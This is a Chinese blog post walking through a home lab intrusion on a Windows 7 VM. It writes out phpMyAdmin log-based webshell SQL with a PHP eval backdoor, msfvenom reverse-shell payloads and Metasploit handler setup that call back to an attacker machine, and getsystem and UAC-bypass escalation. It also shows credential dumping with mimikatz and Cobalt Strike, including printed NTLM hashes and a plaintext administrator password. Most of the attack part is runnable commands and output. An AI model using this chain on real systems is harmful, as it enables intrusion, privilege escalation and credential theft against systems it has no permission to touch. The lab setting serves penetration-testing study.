内网实验1:getshell、上线提权、抓取主机密码

最新推荐文章于 2024-07-13 16:09:04 发布
最新推荐文章于 2024-07-13 16:09:04 发布
阅读量3.1k 收藏 15
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soldi_er/article/details/116595727
版权

文章目录

概述

  实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。

  环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。
  过了一段时间,重新打开电脑和虚拟机,发现开启桥接模式的Kali和Win7可以相互ping通,但都无法与宿主机交互,ping不通。实验机器如下:

三台主机都开启VMnet0的桥接模式,VMnet0的桥接模式选择"桥接至自动"。
	Kali攻击机1:192.168.43.57
	Kali攻击机2:192.168.43.58(作为CS服务端,用于Windows主机上线。比赛的时候可以用队友主机)
	Win7外网服务器:192.168.43.100

实验1:打点拿shell

  概述:Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。

  phpMyAdmin通过日志写木马:

用途命令结果
查看日志状态show variables like ‘%general%’;general_log:OFF。general_log_file。
开启全局日志SET GLOBAL general_log=‘on’
设置路径SET GLOBAL general_log_file=‘C:\phpStudy\www\shell.php’可访问、可执行
写木马select ‘<?php @eval($_POST[shell]);?>’执行成功

  访问192.168.43.100/shell.php,提示403,应该是因为刚装的phpstudy没有配置。
直接在Win7的www目录下写入shell.php,进入下一步骤。

实验2:上线提权并抓取密码

  问题:Kali没有安装蚁剑。
解决:使用Kali安装蚁剑,详情查看博客内的安装教程。
踩坑:复制物理机的桥接模式,在VMnet0中必须选择网卡,不能选择自动,否则没网。
  问题:已知msf生成exe上线meterpreter,但CS如何上线?
解决:推测cs的服务端和客户端可以在一台主机上同时运行,通过端口转发确实可以。

1.上线MSF提权并抓取密码

  (1)msfvenom生成木马

	使用windows反连程序.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.57 LPORT=7777 -f exe > /home/blade/MyFiles/MSF_Horse/inlab1-202105/Win7_43100.exe
(亲测可行,上次可行,这次也可行)
	
	生成php反连程序.php,访问Win7_43100.php使执行
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.57 LPORT=7777 -f raw > /home/blade/MyFiles/MSF_Horse/inlab1-202105/Win7_43100.php
	(亲测被杀)
	反连被杀信息:[*] 192.168.43.100 - Command shell session 1 closed.

  (2)使用MSF的handler模块接收反弹模块,使用蚁剑上传,在蚁剑的命令行执行命令Win7_43100.exe,执行文件,反连成功。

	msfconsole
	
	Windows反连
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.57(攻击机地址)
set LPORT 7777
exploit
	
	php反连,会杀“session closed”,可以考虑做免杀绕过
use exploit/multi/handler
show options
set LHOST 192.168.43.57(攻击机地址)
set LPORT 7777
run

在这里插入图片描述  (3)使用meterpreter查看系统信息和用户身份,以及提权等操作。
切换:meterpreter通过shell命令进入shell,shell通过exit命令退回到meterpreter。

目的meterpreter命令结果
查看系统信息sysinfo-
查看当前用户getuidGOD\Administrator
后台运行会话,返回MSF页面background-
查看所有会话show sessions-
恢复与会话的交互sessions -i 会话id-
直接提权getsystem成功提权…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
bypassuac模块提权use exploit/windows/local/bypassuac_eventvwrbypassuac提权失败,可以尝试i_eventvwr

在这里插入图片描述

  (4)使用meterpreter抓取Windows主机密码。
昨天的session已经没了,重新use exploit/multi/handlerset payload xxx
使用蚁剑执行exe木马。(每一次执行木马都需要用蚁剑连接后门,还是php等木马方便)

  运行load mimikatz,发现最近版本msf6中,mimikatz被kiwi模块合并了。
查看kiwi的使用指南:help kiwi
列举所有凭据:creds_all
列举所有kerberos凭据:creds_kerberos
调用kiwi_cmd执行mimikatz命令:kiwi_cmd sekurlsa::logonpasswords

  Kiwi的使用,发现执行命令没有结果或报错。
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
  网上查找资料,mimikatz模块需要两个条件:
1.权限Admistrator或system;2.支持32/64位,但默认加载32位,对于64位很多模块无法默认加载,需要把meterpreter进程迁移到一个64位程序的进程中,才能正常使用。
在这里插入图片描述
在这里插入图片描述


2.上线CS提权并抓取密码

  (1)启动CS客户端和服务端,生成木马并通过蚁剑上传,完成上线。
  Kali机开启CS服务端:./teamserver 192.168.43.57 123456
  如果想在Kali同时启动CS服务端,正常启动登录会报错"网络不可达"。
[!] Trapped java.net.SocketException during client connect [dialog action: Connect]: 网络不可达 (connect failed)

  服务端:使用Kali攻击机2作为CS服务端:在192.168.43.58主机上开启服务端,
./teamserver 192.168.43.58 123456
  客户端:kali攻击机1连接服务端:./start.sh,输入服务端ip和口令,连接成功。

  生成木马:首先设置监听,填写服务端的IP地址和监听端口。
生成木马,Attack->Packages->Windows Executable。
打开蚁剑,上传生成的32位可执行木马文件。在蚁剑中执行木马,上线成功。

在这里插入图片描述

在这里插入图片描述
  (2)使用CS抓取Windows主机密码。右键选择上线主机,Access->Run mimikatz。
  在beacon中输入getsystem提权
  在beacon中输入getuid查看当前身份
  在beacon中输入hashdump查看密码,可以看到3个用户的哈希
  在beacon中输入logonpasswords抓取密码,找出了5个Authentication Id,其中包含Administrator及其明文口令。

  还可以上传biLaZagne.exe,获取当前主机各个软件存储的密码。

在这里插入图片描述

beacon> loginpasswords
[-] Unknown command: loginpasswords
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:

Authentication Id : 0 ; 643369 (00000000:0009d129)
Session           : Interactive from 1
User Name         : Administrator
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2021/5/11 7:27:15
SID               : S-1-5-21-2952760202-1353902439-2381784089-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : GOD
	 * LM       : edea194d76c77d87840ac10a764c7362
	 * NTLM     : 8a963371a63944419ec1adf687bb1be5
	 * SHA1     : 343f44056ed02360aead5618dd42e4614b5f70cf
	tspkg :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : hongrisec@2019
	wdigest :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : hongrisec@2019
	kerberos :	
	 * Username : Administrator
	 * Domain   : GOD.ORG
	 * Password : hongrisec@2019
	ssp :	
	credman :

参考

  《ATT&CK实战 | 红队评估一(上)》
https://www.freebuf.com/column/230476.html

  《msf_bypassuac提权》,2018-05
https://blog.csdn.net/DarkHQ/article/details/80410461

  《渗透工具之msf》,2019-03。(对MSF命令的说明,很有用)
https://blog.csdn.net/rentian1/article/details/88921336

  《使用msf的kiwi模块获取靶机明文密码,提示32位mimikatz无法接入64位程序怎么处理?》,2021-05,https://www.zhihu.com/question/458777798

  《Metasploit-进阶用户密码与mimikatz模块kiwi模块》, 2020-10
https://blog.csdn.net/qq_38626043/article/details/109388147

区块链市场观察家
关注
专栏目录
内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 592
所以,以往的例如:Windows 7,Windows 8,Windows Server 2008R2和Windows Server 2012也可以更新该补丁后获得上述安全保护机制。在windows server 2012 R2中,新增了一个Protected Users 安全组,将用户加入到该组,用户的明文密码就不会被获取。这种情况对方只要输入密码,只要一输入密码密码就会以明文的形式保存在内存中,我们就又能够抓到明文密码了。我们还有一种方式是通过锁屏,来让对方在输入一次密码,然后我们抓取密码
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞
HACKONE的博客
06-24 542
当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。set payload windows/x64/meterpreter/bind_tcp //正向连接上线。run post/multi/manage/autoroute //添加当前路由表。
MSF渗透利用木马
nnjnknkj的博客
12-28 868
基于木马的渗透测试
值班惊魂!曲折“入侵”事件曝光:Windows 机器本地保存RDP密码破解
最新发布
07-13 687
这个故事不仅是一次关于值班的小插曲,更是对网络安全、系统管理以及应急处理的一次深刻反思。这个故事又给你带来了哪些关于日常工作中的安全隐患和应对措施的启示?希望它能引发你的深入思考,并提醒我们在日常工作中时刻保持警惕,防范潜在的风险。
MSF-win2003-getshell
qq_59826623的博客
09-17 136
许久未用的服务器忘记密码,尝试几次无果后,决定自己打进去看看。
Vulnhub 靶机 Quaoar write up wordpresscms 漏洞利用上传插件 getshell wp-config 获取到数据库账号密码 用于ssh登录提权
YouthBelief的博客
12-29 2431
0x00 环境搭建 下载地址 https://download.vulnhub.com/hackfest2016/Quaoar.ova 运行环境 Virtual Box 仅主机网络 kali 搭建同网卡 目标 root权限 flag文件 0x01 信息收集 靶机ip探测 nmap -sP 192.168.56.0/24 192.168.56.109 端口服务探测识别 nmap -sC -sV -A -p- 192.168.56.109 -o port.txt 22/tcp
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
7Riven's blog
12-10 2537
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
CVE-2020-0796漏洞复现getshell
臭nana的博客
06-08 4135
漏洞描述 SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 漏洞原理 Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。 Windows 10和Wi
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 317
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&RBCD资源&Operators组成员&HTLMRelay结合
HACKONE的博客
06-23 370
基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。所以核心就是谁或什么权限能修改msDS-AllowedToActOnBehalfOfOtherIdentity。
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2191
红日靶场渗透教程
获取明文密码神器mimikatz最新版
06-13
包含最新版工具和使用文档。 mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器,其强大的功能还有待挖掘。
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 1363
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
PPL攻击详解
hongduilanjun的博客
11-01 3911
PPL表示“受保护的流程”,但在此之前,只有“受保护的流程”。Windows Vista / Server 2008引入了受保护进程的概念,其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并符合DRM(数字版权管理)要求。Microsoft开发了此机制,以便您的媒体播放器可以读取例如蓝光,同时防止您复制其内容。当时的要求是映像文件(即可执行文件)必须使用特殊的Windows Media证书进行数字签名(如Windows Internals的“受保护的过程”部分所述)。
Mimikatz ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
BlackNight168的博客
12-19 723
关键进口” 我尝试了早期版本2.1.1 #17763,并运行sekurlsa::logonpasswords就可以了。原文链接:https://blog.csdn.net/u012206617/article/details/129790597。版权声明:本文为CSDN博主「墨痕诉清风」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。从报错信息看,有一个key导致失败了,查了一下github原地址 issue 找到了答案。1. 确定不是权限的问题,已是最高权限。
MSF渗透永恒之蓝
nnjnknkj的博客
12-28 968
MSF利用 永恒之蓝入侵
msf 使用mimikatz获取明文密码过程中报错Retrieving wdigest credentials
sweelg的博客
06-02 1488
当我们用meterpreter提权成功之后
你的手机曾经被监控过吗?
ailx10
08-07 1319
生活中,经常有人说自己手机被监控了,微信聊天记录被监控了,手机摄像头被打开了。今天我做了一个简单的测试,验证了安卓9会被监控,安卓11不会被监控,腾讯手机管家可以成功查杀到木马病毒,因此,针对手机被监控的知友们,不要下载色情APP,买好一点的手机,并且安装杀毒软件,安装新软件之后,立马进行病毒检测。第一步:黑客或骗子团伙会准备好一个木马病毒,比如色情APP第二步:黑客或骗子团伙,会在公网上配置好监...
give me the information about death stranding in detail
04-02
Death Stranding is a video game developed by Kojima Productions and published by Sony Interactive Entertainment. It was released for the PlayStation 4 in November 2019 and for Microsoft Windows in July 2020. The game was directed by Hideo Kojima, who is also known for creating the Metal Gear Solid series. The game takes place in a post-apocalyptic world where supernatural creatures known as "Beached Things" (BTs) roam the land. The player takes on the role of Sam Porter Bridges, a courier tasked with delivering packages and connecting isolated communities in this fragmented world. As Sam travels across the landscape, he must navigate treacherous terrain, avoid hostile enemies, and manage his resources to survive. One of the unique features of the game is its focus on social connections. Players can build structures and leave supplies for other players to use, and they can also receive help from other players in the form of shared resources and information. The game also features a complex storyline that explores themes of life, death, and human connection. The game has received mixed reviews, with some critics praising its innovative gameplay and storytelling, while others have criticized its slow pacing and convoluted narrative. Despite these mixed reviews, the game has developed a passionate fanbase and has been praised for its artistic and philosophical themes. In summary, Death Stranding is a post-apocalyptic video game that follows the journey of Sam Porter Bridges as he navigates a dangerous and fragmented world to deliver packages and connect isolated communities. The game features a unique focus on social connections and explores themes of life, death, and human connection.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值